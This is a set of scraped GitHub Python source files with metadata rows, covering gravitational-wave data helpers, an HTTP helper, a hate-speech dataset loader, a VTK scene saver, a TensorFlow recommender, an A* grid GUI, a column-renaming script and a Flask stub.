os.makedirs(PATH_TO_STATIC_NOISE_FOLDER)
if not os.path.isdir(PATH_TO_TMP_FOLDER):
os.makedirs(PATH_TO_TMP_FOLDER)
if 'IS_CHARLIE' in os.environ:
print('We are on Charlie')
os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'
os.environ['CUDA_VISIBLE_DEVICES'] = '2'
#os.environ["PYTORCH_CUDA_ALLOC_CONF"] = "max_split_size_mb:2000"
def print_red(*text):
print(f'{bcolors.FAIL}{" ".join([str(t) for t in text])}{bcolors.ENDC}')
def print_blue(*text):
print(f'{bcolors.OKCYAN}{" ".join([str(t) for t in text])}{bcolors.ENDC}')
def print_green(*text):
print(f'{bcolors.OKGREEN}{" ".join([str(t) for t in text])}{bcolors.ENDC}')
def print_yellow(*text):
print(f'{bcolors.WARNING}{" ".join([str(t) for t in text])}{bcolors.ENDC}')
def open_hdf5_file(path_to_file):
result = {}
with h5py.File(path_to_file, 'r') as hd5_file:
base_key = list(hd5_file.keys())[0]
result['base_key'] = base_key
result['frequencies'] = np.array(hd5_file[f'{base_key}/frequency_Hz'])
result['h1'] = {}
result['l1'] = {}
result['h1']['amplitudes'] = np.array(hd5_file[f'{base_key}/H1/SFTs'])
result['l1']['amplitudes'] = np.array(hd5_file[f'{base_key}/L1/SFTs'])
result['h1']['timestamps'] = np.array(hd5_file[f'{base_key}/H1/timestamps_GPS'])
result['l1']['timestamps'] = np.array(hd5_file[f'{base_key}/L1/timestamps_GPS'])
return result
def get_df_dynamic_noise():
assert len(os.listdir(PATH_TO_DYNAMIC_NOISE_FOLDER)) != 0, 'There must be data in noise folder'
return [os.path.join(PATH_TO_DYNAMIC_NOISE_FOLDER, p) for p in os.listdir(PATH_TO_DYNAMIC_NOISE_FOLDER)]
def get_df_static_noise():
assert len(os.listdir(PATH_TO_STATIC_NOISE_FOLDER)) != 0, 'There must be data in static_noise folder'
return [os.path.join(PATH_TO_STATIC_NOISE_FOLDER, p) for p in os.listdir(PATH_TO_STATIC_NOISE_FOLDER)]
def get_df_signal():
assert len(os.listdir(PATH_TO_SIGNAL_FOLDER)) != 0, 'There must be data in signal folder'
all_files = [os.path.join(PATH_TO_SIGNAL_FOLDER, p) for p in os.listdir(PATH_TO_SIGNAL_FOLDER)]
all_files = sorted(all_files)
offset = len(all_files) // 2
return [(all_files[i], all_files[i+offset]) for i in range(offset)]
def normalize_image(img):
img += abs(np.min(img))
img /= np.max(img)
img *= 255
return img
if __name__ == '__main__':
print_red('This', 'text', 'is red', 1, 23)
print_blue('This', 'text', 'is blue', 1, 23)
print_green('This', 'text', 'is green', 1, 23)
print_yellow('This', 'text', 'is yellow', 1, 23)
| felix-20/gravitational_oceans | src/helper/utils.py | utils.py | py | 5,376 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.environ",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_nu... |
12803394908 | import urllib2
import json
headers = {'Content-Type': 'application/json; charset=utf-8'}
XXX_HOST = "http://xxx.xxx.com/xxx-app/"
# post请求,json格式数据
def post_json(url, header, request_data):
req = urllib2.Request(url, request_data, header)
page = urllib2.urlopen(req)
res = page.read()
page.close()
return res
YYY_HOST = "http://yyy.yyy.com/yyy-app/"
# get请求
def get_(param1, param2):
url = YYY_HOST + "yyyy/yyyy?param1=" + \
str(param1) + "¶m2=" + str(param2) + "¶m3=VIP"
req = urllib2.Request(url)
page = urllib2.urlopen(req, timeout=5000)
res = page.read()
page.close()
return json.loads(res)["data"] | AldrichYang/HelloPython2 | src/http/http_helper.py | http_helper.py | py | 690 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "urllib2.Request",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "urllib2.urlopen",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "urllib2.Request",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "urllib2.urlopen",
... |
13425691279 | ### Unzip the Dataset
# importing the zipfile module
from zipfile import ZipFile
import pandas as pd
import random
# loading the temp.zip and creating a zip object
with ZipFile("./resources/Sentences_from_Stormfront_dataset.zip", 'r') as zip_oject:
# Extracting all the members of the zip
# into a specific location.
zip_oject.extractall(path="./resources/")
path_to_extracted_folder = './resources/Sentences_from_Stormfront_dataset/'
path_to_data_files = './resources/Sentences_from_Stormfront_dataset/all_files/'
def get_500_stormfront_non_hateful_data():
annotation_metadata = pd.read_csv(path_to_extracted_folder + 'annotations_metadata.csv')
list_of_additional_data = []
hard_labels_of_additional_data = []
for i in range(500):
rand_num = random.randint(0, len(annotation_metadata) - 1)
while annotation_metadata['label'][rand_num] == 'hate':
rand_num = random.randint(0, len(annotation_metadata) - 1)
file_address = path_to_data_files + annotation_metadata['file_id'][rand_num] + '.txt'
text = open(file_address, "r").read()
list_of_additional_data.append(text)
hard_labels_of_additional_data.append(0.0)
return list_of_additional_data, hard_labels_of_additional_data
def get_stormfront_hateful_data():
annotation_metadata = pd.read_csv(path_to_extracted_folder + 'annotations_metadata.csv')
list_of_additional_data = []
hard_labels_of_additional_data = []
for i in range(len(annotation_metadata)):
if annotation_metadata['label'][i] == 'hate':
file_address = path_to_data_files + annotation_metadata['file_id'][i] + '.txt'
text = open(file_address, "r").read()
list_of_additional_data.append(text)
hard_labels_of_additional_data.append(1.0)
return list_of_additional_data, hard_labels_of_additional_data
| Speymanhs/SemEval_2023_Task_11_Lonea | reading_dataset_stormfront.py | reading_dataset_stormfront.py | py | 1,887 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "zipfile.ZipFile",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "random.randint",
"l... |
71578985703 | #!/usr/bin/env python
import vtk
def main():
pd_fn, scene_fn = get_program_parameters()
colors = vtk.vtkNamedColors()
polyData = ReadPolyData(pd_fn)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputData(polyData)
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetDiffuseColor(colors.GetColor3d("Crimson"))
actor.GetProperty().SetSpecular(.6)
actor.GetProperty().SetSpecularPower(30)
renderer = vtk.vtkRenderer()
renderWindow = vtk.vtkRenderWindow()
renderWindow.AddRenderer(renderer)
renderWindowInteractor = vtk.vtkRenderWindowInteractor()
renderWindowInteractor.SetRenderWindow(renderWindow)
renderer.AddActor(actor)
renderer.SetBackground(colors.GetColor3d("Silver"))
# Interact to change camera.
renderWindow.Render()
renderWindowInteractor.Start()
# After the interaction is done, save the scene.
SaveSceneToFile(scene_fn, actor, renderer.GetActiveCamera())
renderWindow.Render()
renderWindowInteractor.Start()
# After interaction , restore the scene.
RestoreSceneFromFile(scene_fn, actor, renderer.GetActiveCamera())
renderWindow.Render()
renderWindowInteractor.Start()
def get_program_parameters():
import argparse
description = 'Saving a scene to a file.'
epilogue = '''
'''
parser = argparse.ArgumentParser(description=description, epilog=epilogue,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('data_file', help='A polydata file e.g. Armadillo.ply.')
parser.add_argument('scene_file', help='The file to save the scene to.')
args = parser.parse_args()
return args.data_file, args.scene_file
def ReadPolyData(file_name):
import os
path, extension = os.path.splitext(file_name)
extension = extension.lower()
if extension == ".ply":
reader = vtk.vtkPLYReader()
reader.SetFileName(file_name)
reader.Update()
poly_data = reader.GetOutput()
elif extension == ".vtp":
reader = vtk.vtkXMLpoly_dataReader()
reader.SetFileName(file_name)
reader.Update()
poly_data = reader.GetOutput()
elif extension == ".obj":
reader = vtk.vtkOBJReader()
reader.SetFileName(file_name)
reader.Update()
poly_data = reader.GetOutput()
elif extension == ".stl":
reader = vtk.vtkSTLReader()
reader.SetFileName(file_name)
reader.Update()
poly_data = reader.GetOutput()
elif extension == ".vtk":
reader = vtk.vtkpoly_dataReader()
reader.SetFileName(file_name)
reader.Update()
poly_data = reader.GetOutput()
elif extension == ".g":
reader = vtk.vtkBYUReader()
reader.SetGeometryFileName(file_name)
reader.Update()
poly_data = reader.GetOutput()
else:
# Return a None if the extension is unknown.
poly_data = None
return poly_data
def SaveSceneToFile(file_name, actor, camera):
# Actor
# Position, orientation, origin, scale, usrmatrix, usertransform
# Camera
# FocalPoint, Position, ViewUp, ViewAngle, ClippingRange
fp_format = '{0:.6f}'
res = dict()
res['Camera:FocalPoint'] = ', '.join(fp_format.format(n) for n in camera.GetFocalPoint())
res['Camera:Position'] = ', '.join(fp_format.format(n) for n in camera.GetPosition())
res['Camera:ViewUp'] = ', '.join(fp_format.format(n) for n in camera.GetViewUp())
res['Camera:ViewAngle'] = fp_format.format(camera.GetViewAngle())
res['Camera:ClippingRange'] = ', '.join(fp_format.format(n) for n in camera.GetClippingRange())
with open(file_name, 'w') as f:
for k, v in res.items():
f.write(k + ' ' + v + '\n')
def RestoreSceneFromFile(file_name, actor, camera):
import re
# Some regular expressions.
reCP = re.compile(r'^Camera:Position')
reCFP = re.compile(r'^Camera:FocalPoint')
reCVU = re.compile(r'^Camera:ViewUp')
reCVA = re.compile(r'^Camera:ViewAngle')
reCCR = re.compile(r'^Camera:ClippingRange')
keys = [reCP, reCFP, reCVU, reCVA, reCCR]
# float_number = re.compile(r'[^0-9.\-]*([0-9e.\-]*[^,])[^0-9.\-]*([0-9e.\-]*[^,])[^0-9.\-]*([0-9e.\-]*[^,])')
# float_scalar = re.compile(r'[^0-9.\-]*([0-9.\-e]*[^,])')
res = dict()
with open(file_name, 'r') as f:
for cnt, line in enumerate(f):
if not line.strip():
continue
line = line.strip().replace(',', '').split()
for i in keys:
m = re.match(i, line[0])
if m:
k = m.group(0)
if m:
# Convert the rest of the line to floats.
v = list(map(lambda x: float(x), line[1:]))
if len(v) == 1:
res[k] = v[0]
else:
res[k] = v
for k, v in res.items():
if re.match(reCP, k):
camera.SetPosition(v)
elif re.match(reCFP, k):
camera.SetFocalPoint(v)
elif re.match(reCVU, k):
camera.SetViewUp(v)
elif re.match(reCVA, k):
camera.SetViewAngle(v)
elif re.match(reCCR, k):
camera.SetClippingRange(v)
if __name__ == '__main__':
main()
| lorensen/VTKExamples | src/Python/Utilities/SaveSceneToFile.py | SaveSceneToFile.py | py | 5,409 | python | en | code | 319 | github-code | 36 | [
{
"api_name": "vtk.vtkNamedColors",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "vtk.vtkPolyDataMapper",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "vtk.vtkActor",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "vtk.vtkRenderer"... |
3479784873 | # This is the model definition of retrieval model.
from typing import List, Dict, Tuple, Text
import os
import tensorflow as tf
import tensorflow_recommenders as tfrs
import numpy as np
from . import dataset as ds, params
# Get unique query and candidate and timestamp.
unique_user_ids, unique_therapist_ids = ds.get_unique_query_candidate()
timestamps, timestamps_buckets = ds.get_timestamps()
# Get candidate from dataset.
candidate = ds.get_candidate()
embedding_dimension = params.embedding_dimension
class UserModel(tf.keras.Model):
def __init__(self, use_timestamps=False):
super(UserModel, self).__init__()
# self.use_timestamps = use_timestamps
self.user_model = tf.keras.Sequential([
tf.keras.layers.StringLookup(
vocabulary=unique_user_ids, mask_token=None),
# We add an additional embedding to account for unknown tokens.
tf.keras.layers.Embedding(
len(unique_user_ids) + 1, embedding_dimension)
])
# if self.use_timestamps:
# self.timestamp_model = tf.keras.Sequential([
# tf.keras.layers.Discretization(timestamps_buckets.tolist()),
# tf.keras.layers.Embedding(
# len(timestamps_buckets) + 1, embedding_dimension)
# ])
# self.normalized_timestamp = tf.keras.layers.Normalization(
# axis=None
# )
# self.normalized_timestamp.adapt(timestamps)
def call(self, inputs):
# if not self.use_timestamps:
return self.user_model(inputs["user_id"])
# return tf.concat([
# self.user_model(inputs["user_id"]),
# self.timestamp_model(inputs["timestamp"]),
# tf.reshape(self.normalized_timestamp(inputs["timestamp"]), (-1, 1))
# ], axis=1)
class QueryModel(tf.keras.Model):
"""Model for encoding user queries."""
def __init__(self, layer_sizes):
"""Model for encoding user queries.
Args:
layer_sizes:
A list of integers where the i-th entry represents the number of units
the i-th layer contains.
"""
super().__init__()
# We first use the user model for generating embeddings.
self.embedding_model = UserModel()
# Then construct the layers.
self.dense_layers = tf.keras.Sequential()
# Use the ReLU activation for all but the last layer.
for layer_size in layer_sizes[:-1]:
self.dense_layers.add(tf.keras.layers.Dense(
layer_size, activation="relu"))
# No activation for the last layer.
for layer_size in layer_sizes[-1:]:
self.dense_layers.add(tf.keras.layers.Dense(layer_size))
def call(self, inputs):
feature_embedding = self.embedding_model(inputs)
return self.dense_layers(feature_embedding)
class TherapistModel(tf.keras.Model):
def __init__(self):
super().__init__()
max_token = 10_000
self.title_embedding = tf.keras.Sequential([
tf.keras.layers.StringLookup(
vocabulary=unique_therapist_ids, mask_token=None),
tf.keras.layers.Embedding(
len(unique_therapist_ids) + 1, embedding_dimension)
])
self.title_vectorizer = tf.keras.layers.TextVectorization(
max_tokens=max_token
)
self.title_text_embedding = tf.keras.Sequential([
self.title_vectorizer,
tf.keras.layers.Embedding(
max_token, embedding_dimension, mask_zero=True),
tf.keras.layers.GlobalAveragePooling1D()
])
self.title_vectorizer.adapt(candidate)
def call(self, inputs):
return tf.concat([
self.title_embedding(inputs),
self.title_text_embedding(inputs)
], axis=1)
class CandidateModel(tf.keras.Model):
"""Model for encoding therapists."""
def __init__(self, layer_sizes):
"""Model for encoding therapists.
Args:
layer_sizes:
A list of integers where the i-th entry represents the number of units
the i-th layer contains.
"""
super().__init__()
self.embedding_model = TherapistModel()
# Then construct the layers.
self.dense_layers = tf.keras.Sequential()
# Use the ReLU activation for all but the last layer.
for layer_size in layer_sizes[:-1]:
self.dense_layers.add(tf.keras.layers.Dense(
layer_size, activation="relu"))
# No activation for the last layer.
for layer_size in layer_sizes[-1:]:
self.dense_layers.add(tf.keras.layers.Dense(layer_size))
def call(self, inputs):
feature_embedding = self.embedding_model(inputs)
return self.dense_layers(feature_embedding)
class RetrievalDefinition(tfrs.Model):
def __init__(self):
super().__init__()
self.query_model: tf.keras.Model = QueryModel(params.layer_size)
self.candidate_model: tf.keras.Model = CandidateModel(
params.layer_size)
self.task: tf.keras.layers.Layer = tfrs.tasks.Retrieval(
metrics=tfrs.metrics.FactorizedTopK(
candidates=candidate.batch(128).map(self.candidate_model)
)
)
def compute_loss(self, features: Dict[Text, tf.Tensor], training=False) -> tf.Tensor:
# We pick out the user features and pass them into the user model.
user_embeddings = self.query_model({
"user_id": features["user_id"],
})
# And pick out the therapist features and pass them into the therapist model,
# getting embeddings back.
positive_therapist_embeddings = self.candidate_model(
features["therapist_id"])
# The task computes the loss and the metrics.
return self.task(user_embeddings, positive_therapist_embeddings, compute_metrics=not training)
| thomiaditya/theia | theia/config/recommender/retrieval_definition.py | retrieval_definition.py | py | 6,028 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tensorflow.keras",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras.Sequential",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name"... |
37248697117 | # Importing libraries and modules
from tkinter import *
from PIL import ImageTk, Image
import time
from tkinter import messagebox
from tkinter.filedialog import askopenfilename
# Start of GUI
root = Tk()
root.title("A-Star Grid World")
# Grid Initialization
# Ask the user if he wants to load a pre-deined world map
result = messagebox.showinfo("Choose Location","Give path of A-Star Grid World Map")
filename = askopenfilename() # show an "Open" dialog box and return the path to the selected file
# filename = "/Users/abhianshusingla/Documents/IS_Project/A-Star/map1.txt"
# Read a grid world from pre-defined values
read_file = open(filename, "r")
read_str = str(read_file.read())
read_str = read_str.split("\n")
# Initialize start point
token = read_str[0].split(" ")
init = []
init.append(int(token[0]))
init.append(int(token[1]))
# Initialize goal point
token = read_str[1].split(" ")
goal = []
goal.append(int(token[0]))
goal.append(int(token[1]))
# Create grid
grid = []
for i in range(2, len(read_str)):
token = read_str[i].split(" ")
if(len(token) != 1):
grid.append(list(map(int, token)))
# Size of Grid
rows = len(grid)
columns = len(grid[0])
# GUI Parameters
sleep_time = 9.9
bg_color = "PINK"
fg_color1 = "BLACK"
fg_color2 = "PURPLE"
fontStyle = "Chalkboard"
cell_size = 50
offset = 10
grids = {}
# Frames
main_frame = Frame(root, bg = bg_color)
main_frame.pack()
left_frame = Frame(main_frame, bg = bg_color)
left_frame.pack(side=LEFT)
right_frame = Frame(main_frame, bg = bg_color)
right_frame.pack(side=TOP)
# Left Frame Functionality
# Creating a 2D Grid
def createGrid():
for i in range(0,rows + 1):
x_start = offset
y = i * cell_size + offset
x_end = columns * cell_size + offset
gridCanvas.create_line([(x_start,y),(x_end,y)])
for i in range(0,columns + 1):
y_start = offset
x = i * cell_size + offset
y_end = rows * cell_size + offset
gridCanvas.create_line([(x,y_start),(x,y_end)])
for i in range(0, rows):
temp = []
for j in range(0, columns):
x = i * cell_size + offset
y = j * cell_size + offset
grids[(i,j)] = (x,y)
temp.append((x,y))
return grids
# Load all images
def loadImages():
img_robot = Image.open("/Users/abhianshusingla/Documents/DynamicPathPlanning/images/robot1.png")
img_robot = img_robot.resize((cell_size, cell_size))
gridCanvas.img_robot = (ImageTk.PhotoImage(img_robot))
img_target = Image.open("/Users/abhianshusingla/Documents/DynamicPathPlanning/images/target.png")
img_target = img_target.resize((cell_size, cell_size))
gridCanvas.img_target = (ImageTk.PhotoImage(img_target))
img_start = Image.open("/Users/abhianshusingla/Documents/DynamicPathPlanning/images/start.png")
img_start = img_start.resize((cell_size, cell_size))
gridCanvas.img_start = (ImageTk.PhotoImage(img_start))
img_wall2 = Image.open("/Users/abhianshusingla/Documents/DynamicPathPlanning/images/wall2.png")
img_wall2 = img_wall2.resize((cell_size, cell_size))
gridCanvas.img_wall2 = (ImageTk.PhotoImage(img_wall2))
img_wall1 = Image.open("/Users/abhianshusingla/Documents/DynamicPathPlanning/images/wall1.png")
img_wall1 = img_wall1.resize((cell_size, cell_size))
gridCanvas.img_wall1 = (ImageTk.PhotoImage(img_wall1))
# Draws robot at cell coordinates x and y
def drawRobot(x,y):
x1 = grids[(x,y)][0]
y1 = grids[(x,y)][1]
gridCanvas.create_image(y1, x1, image=gridCanvas.img_robot, anchor='nw')
# Draws house at cell coordinates x and y
def drawStart(x,y):
x1 = grids[(x,y)][0]
y1 = grids[(x,y)][1]
gridCanvas.create_image(y1, x1, image=gridCanvas.img_robot, anchor='nw')
# Draws wall at cell coordinates x and y
def drawWall(x,y):
x1 = grids[(x,y)][0]
y1 = grids[(x,y)][1]
gridCanvas.create_image(y1, x1, image=gridCanvas.img_wall1, anchor='nw')
# Draws wall at cell coordinates x and y
def drawWall2(x,y):
x1 = grids[(x,y)][0]
y1 = grids[(x,y)][1]
gridCanvas.create_image(y1, x1, image=gridCanvas.img_wall2, anchor='nw')
# Draws flag at cell coordinates x and y
def drawTarget(x,y):
x1 = grids[(x,y)][0]
y1 = grids[(x,y)][1]
gridCanvas.create_image(y1, x1, image=gridCanvas.img_target, anchor='nw')
# Writes text at cell coordinates x and y
def drawText(x,y,f,g,h,c):
x1 = grids[(x,y)][0]
y1 = grids[(x,y)][1]
costs = str(str(f) + "\n" + str(g) + "\n" + str(h))
if(not (goal[0] == x and goal[1] == y)):
gridCanvas.create_rectangle(y1, x1, y1 + cell_size, x1 + cell_size, fill=c)
gridCanvas.create_text(y1, x1, text = costs, anchor='nw', state = 'disabled')
# Reinitialization of code
def restart():
for i in range(rows):
for j in range(columns):
x1 = grids[(i,j)][0]
y1 = grids[(i,j)][1]
if(grid[i][j] != 1):
gridCanvas.create_rectangle(y1, x1, y1 + cell_size, x1 + cell_size, fill = "white")
if(i == init[0] and j == init[1]):
drawStart(i,j)
if(i == goal[0] and j == goal[1]):
drawTarget(i,j)
# if(grid[i][j] == 1):
# drawWall2(i,j)
# Creation of Grid Canvas
gridCanvas = Canvas(left_frame, height = rows * cell_size + 2 * offset, width = columns * cell_size + 2 * offset)
gridCanvas.pack(fill=BOTH, expand = True)
# Creation of Grid
grids = createGrid()
# Loading all the images
loadImages()
# Draw Start, Obstacle and Goal Images
drawStart(init[0],init[1])
drawTarget(goal[0],goal[1])
for i in range(rows):
for j in range(columns):
if(grid[i][j] == 1):
drawWall2(i,j)
# Right Frame Functionality
which_heuristic = True
isplay = False
cost = 1
D = 1
# Selection of Heuristic
def selectHeuristic():
global which_heuristic
which_heuristic = (env.get() == 1)
return which_heuristic
# check Play Pause Button
def play():
global isplay
if(isplay):
isplay = False
else:
isplay = True
return isplay
# Get sleep time for speed purpose
def get_sleep():
global sleep_time
sleep_time = speed_bar.get()
return sleep_time
# G- cost
def g_cost():
global cost
cost = float(cost_entry.get())
return cost
# D cost
def get_D():
global D
D = float(D_entry.get())
return D
# Controls
control_label = Label(right_frame, text="Controls",font=("Chalkboard", 20), fg = "RED", bg = bg_color)
control_label.pack(anchor = N)
# Heuristics
heuristic_label = Label(right_frame, text="Heuristsics", font=(fontStyle, 16), fg = fg_color1, bg = bg_color)
heuristic_label.pack(anchor = W)
env = IntVar()
env.set(1)
Radiobutton(right_frame, text="Manhattan", variable=env, value=1, command = selectHeuristic, font=(fontStyle, 16), fg = fg_color2, bg = bg_color).pack(anchor=W)
Radiobutton(right_frame, text="Euclidean", variable=env, value=2, command = selectHeuristic, font=(fontStyle, 16), fg = fg_color2, bg = bg_color).pack(anchor=W)
# Play/Pause
play_button = Button(right_frame, command = play, bg = bg_color, fg = fg_color2)
photo_button = ImageTk.PhotoImage(Image.open("/Users/abhianshusingla/Documents/DynamicPathPlanning/images/play1.png").resize((30, 30)))
play_button.config(image=photo_button,width="30",height="30")
play_button.pack()
# Speed Bar
speed_bar = Scale(right_frame, from_= 0, to= 10,length = 200, orient=HORIZONTAL, font=(fontStyle, 16), fg = fg_color2, bg = bg_color)
speed_bar.set(7)
speed_bar.pack(anchor=W)
speed_label = Label(right_frame, text="Speed", font=(fontStyle, 16), fg = fg_color2, bg = bg_color)
speed_label.pack()
# g-Cost
cost_frame = Frame(right_frame)
cost_frame.pack(anchor = W)
cost_label = Label(cost_frame, text = "G-Cost", font=(fontStyle, 16), fg = fg_color2, bg = bg_color)
cost_label.pack(side = LEFT)
cost_entry = Entry(cost_frame, width = 3, bg = bg_color, fg = fg_color2)
cost_entry.pack()
cost_entry.insert(0,1)
# D-value
D_frame = Frame(right_frame)
D_frame.pack(anchor = W)
D_label = Label(D_frame, text = "D-value", font=(fontStyle, 16), fg = fg_color2, bg = bg_color)
D_label.pack(side = LEFT)
D_entry = Entry(D_frame, width = 3, bg = bg_color, fg = fg_color2)
D_entry.pack(side = RIGHT)
D_entry.insert(3,1)
# Main Loop
def start():
root.mainloop()
time.sleep(0.1)
| abhianshi/DynamicPathPlanning | src/AStarGUI.py | AStarGUI.py | py | 8,336 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "tkinter.messagebox.showinfo",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "tkinter.messagebox",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "tkinter.filedialog.askopenfilename",
"line_number": 17,
"usage_type": "call"
},
{
... |
33532139383 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
A script to convert the column names from CamelCase to snake_case.
Typically you would run this file from a command line like this:
ipython3.exe -i -- /deploy/cbmcfs3_runner/scripts/orig/convert_column_case.py
"""
# Built-in modules #
import os
# Third party modules #
import pandas
from tqdm import tqdm
# First party modules #
import autopaths
from autopaths import Path
from autopaths.auto_paths import AutoPaths
from plumbing.common import camel_to_snake
from plumbing.cache import property_cached
# Internal modules #
from cbmcfs3_runner.core.continent import continent
# Constants #
home = os.environ.get('HOME', '~') + '/'
###############################################################################
class CaseConverter(object):
"""
This class takes many of the CSV files in "export/" and "orig/" and
converts their title case in their column names.
"""
all_paths = """
/orig/coefficients.csv
/orig/silv_treatments.csv
/export/ageclass.csv
/export/inventory.csv
/export/classifiers.csv
/export/disturbance_events.csv
/export/disturbance_types.csv
/export/transition_rules.csv
/export/yields.csv
/export/historical_yields.csv
/fusion/back_inventory_aws.csv
"""
def __init__(self, country):
# Default attributes #
self.country = country
# Automatically access paths based on a string of many subpaths #
self.paths = AutoPaths(self.country.data_dir, self.all_paths)
def __call__(self):
for p in self.paths:
# Some countries don't have that fusion file #
if not p: continue
# Read into memory #
df = pandas.read_csv(str(p))
# Change #
df = df.rename(columns = camel_to_snake)
# Write back to disk #
df.to_csv(str(p), index=False, float_format='%g')
def fix_spelling(self):
"""Some words were written wrongly but not in all countries."""
# Read #
df = pandas.read_csv(str(self.paths.disturbance_events))
# Change #
df = df.rename(columns = {'efficency': 'efficiency',
'sor_type': 'sort_type'})
# Write #
df.to_csv(str(self.paths.disturbance_events), index=False, float_format='%g')
###############################################################################
class CaseRenamer(object):
"""
This class takes our python source files and renames the column variables
to match the new case. It can also operate on the jupyter notebooks.
"""
def __init__(self, base_dir, extension):
# Default attributes #
self.base_dir = Path(base_dir)
self.extension = extension
col_names = {
'ageclass': 'AgeClassID,Size',
'classifiers': 'ClassifierNumber,ClassifierValueID',
'disturbances': 'UsingID,SWStart,SWEnd,HWStart,HWEnd,Min_since_last_Dist,'
'Max_since_last_Dist,Last_Dist_ID,Min_tot_biom_C,Max_tot_biom_C,'
'Min_merch_soft_biom_C,Max_merch_soft_biom_C,Min_merch_hard_biom_C,'
'Max_merch_hard_biom_C,Min_tot_stem_snag_C,Max_tot_stem_snag_C,'
'Min_tot_soft_stem_snag_C,Max_tot_soft_stem_snag_C,Min_tot_hard_stem_snag_C,'
'Max_tot_hard_stem_snag_C,Min_tot_merch_stem_snag_C,Max_tot_merch_stem_snag_C,'
'Min_tot_merch_soft_stem_snag_C,Max_tot_merch_soft_stem_snag_C,'
'Min_tot_merch_hard_stem_snag_C,Max_tot_merch_hard_stem_snag_C,Efficency,'
'Sort_Type,Measurement_type,Amount,Dist_Type_ID,Step',
'yields': 'Sp',
'inventory': 'UsingID,Age,Area,Delay,UNFCCCL,HistDist,LastDist',
'transitions': 'UsingID,SWStart,SWEnd,HWStart,HWEnd,Dist_Type_ID,RegenDelay,ResetAge,Percent',
'treatments': 'Dist_Type_ID,Sort_Type,Efficiency,Min_age,Max_age,Min_since_last,'
'Max_since_last,HWP,RegenDelay,ResetAge,Percent,WD,OWC_Perc,Snag_Perc,'
'Perc_Merch_Biom_rem,Man_Nat',
'database': 'TimeStep, UserDefdClassID, UserDefdClassSetID, UserDefdSubclassID,'
'UserDefdSubClassName, AveAge, Biomass, DistArea,'
'BEF_Tot, BG_Biomass, Tot_Merch, Tot_ABG, BG_Biomass,'
'Vol_Merch, Vol_SubMerch, Vol_Snags, TC, TC_FW_C,'
'Vol_Merch_FW_B, Vol_SubMerch_FW_B, Vol_Snags_FW_B,'
'Vol_SubMerch_IRW_B, Vol_Snags_IRW_B,'
'TOT_Vol_FW_B, DMStructureID, DMColumn, DMRow, DMID',
'products': 'SW_Merch, SW_Foliage, SW_Other, HW_Merch, HW_Foliage, HW_Other, SW_Coarse,'
'SW_Fine, HW_Coarse, HW_Fine, Merch_C_ha,'
'Snag_Perc, OWC_Perc, FW_amount, IRW_amount,'
'SoftProduction, HardProduction, DOMProduction,'
'CO2Production, MerchLitterInput, OthLitterInput,'
'Prov_Carbon, Vol_forest_residues,',
'extras': 'IRW_C, FW_C, IRW_B, FW_B'
}
@property_cached
def cols_before(self):
cols_before = ','.join(self.col_names.values()).split(',')
return list(set(name.strip() for name in cols_before))
@property_cached
def cols_after(self):
return [camel_to_snake(col) for col in self.cols_before]
@property_cached
def code_files(self):
return [f for f in self.base_dir.files if f.extension == self.extension]
def __call__(self):
for file in tqdm(self.code_files):
for old_name, new_name in zip(self.cols_before, self.cols_after):
# Only if it is found enclosed in quotes #
file.replace_word("'%s'" % old_name, "'%s'" % new_name)
# Only if it is with the word 'query' on the same line #
self.replace_word_if_other_word(file, old_name, 'query', new_name)
def replace_word_if_other_word(self, path, word1, word2, replacement_word):
"""
Search the file for a given word, and if found,
check the line in which it appears for another second word,
if both the first and second word are found on the same line,
then replace every occurrence of the first word with
the replacement word.
"""
# The original file #
orig_file = Path(path)
# Create a new file #
result_file = autopaths.tmp_path.new_temp_file()
# Generate the lines #
def new_lines():
for line in orig_file:
if word2 in line: yield line.replace(word1, replacement_word)
else: yield line
# Open input/output files, note: output file's permissions lost #
result_file.writelines(new_lines())
# Switch the files around #
orig_file.remove()
result_file.move_to(orig_file)
###############################################################################
if __name__ == '__main__':
# First part #
converters = [CaseConverter(c) for c in continent]
for converter in tqdm(converters): converter()
for converter in tqdm(converters): converter.fix_spelling()
# Second part #
code_dir = home + "repos/cbmcfs3_runner/cbmcfs3_runner/"
renamer = CaseRenamer(code_dir, '.py')
renamer()
# Third part #
code_dir = home + "repos/bioeconomy_notes/notebooks/"
renamer = CaseRenamer(code_dir, '.md')
renamer()
| xapple/cbmcfs3_runner | scripts/orig/convert_column_case.py | convert_column_case.py | py | 7,647 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "os.environ.get",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "autopaths.auto_paths.AutoPaths",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "pandas.... |
36872129562 | #! /usr/bin/python3
# -*- coding:utf-8 -*-
from flask import Flask, request, render_template, redirect
import json
import os
app = Flask(__name__)
@app.route('/')
def accueil():
if os.path.exists("db")==False:
os.mkdir("db")
return render_template('index.html')
